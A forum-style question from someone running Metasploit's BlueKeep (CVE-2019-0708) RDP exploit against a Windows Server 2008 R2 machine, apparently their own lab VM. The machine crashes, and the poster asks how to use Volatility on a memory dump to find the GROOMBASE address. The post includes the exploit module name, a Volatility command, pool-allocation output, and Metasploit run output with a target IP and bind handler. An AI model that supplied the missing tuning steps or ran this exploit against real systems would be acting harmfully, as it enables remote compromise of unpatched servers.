I am exploiting bluekeep vulnerability in windows server 2008 R2 using metasploit framework. When I run the exploit windows/rdp/cve_2019_0708_bluekeep_rce, it ends in BSOD on server and then server restarts. I searched on internet and found that I might have to change GROOMBASE address in exploit. I am using volatility to get this address on server memory dump. Here is the command I came up with;
.\volatility_2.6_win64_standalone.exe --profile=Win2008R2SP1x64 -f vm.memdump bigpools
But this command gives me never ending output;
Volatility Foundation Volatility Framework 2.6
Allocation Tag PoolType NumberOfBytes
------------------ -------- -------------------------- -------------
0xfffff8a002dc3000 CM31 PagedPoolCacheAligned 0x1000L
0xfffff8a0074e6000 CM31 PagedPoolCacheAligned 0x1000L
0xfffff8a003747000 CM31 PagedPoolCacheAligned 0x1000L
0xfffffa8000eb7000 Cont NonPagedPool 0x1000L
0xfffff8a0040cb000 CM31 PagedPoolCacheAligned 0x1000L
0xfffff8a004a4f000 CM31 PagedPoolCacheAligned 0x2000L
0xfffff8a000cb0000 CIcr PagedPool 0x3330L
0xfffff8a0053d3000 CM31 PagedPoolCacheAligned 0x1000L
0xfffff8a001634001 CM31 PagedPoolCacheAligned 0x1000L
0xfffff8a005d57000 CM31 PagedPoolCacheAligned 0x1000L
0xfffff8a001fb8000 CM31 PagedPoolCacheAligned 0x1000L
0xfffff8a0066db000 CM31 PagedPoolCacheAligned 0x1000L
and goes on ..
I had to interrupt the command to make it stop. Then I randomly used first NPP address which (definitely id not correct) gave me BSOD on server and metasploit output is here.
[*] 192.168.0.60:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check
[+] 192.168.0.60:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 192.168.0.60:3389 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.0.60:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8011e07000, Channel count 1.
[!] 192.168.0.60:3389 - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.0.60:3389 - Surfing channels ...
[*] 192.168.0.60:3389 - Lobbing eggs ...
[*] 192.168.0.60:3389 - Forcing the USE of FREE'd object ...
[!] 192.168.0.60:3389 - <---------------- | Leaving Danger Zone | ---------------->
[*] Started bind TCP handler against 192.168.0.60:4444
[*] Exploit completed, but no session was created.
I guess above result is due to wrong GROOMBASE address which I selected.
The link (given above) I am following uses docker to get NPP Start address. My question is can I find that address using volatility as its also a memory forensic tool. Please suggest which command should I be using?
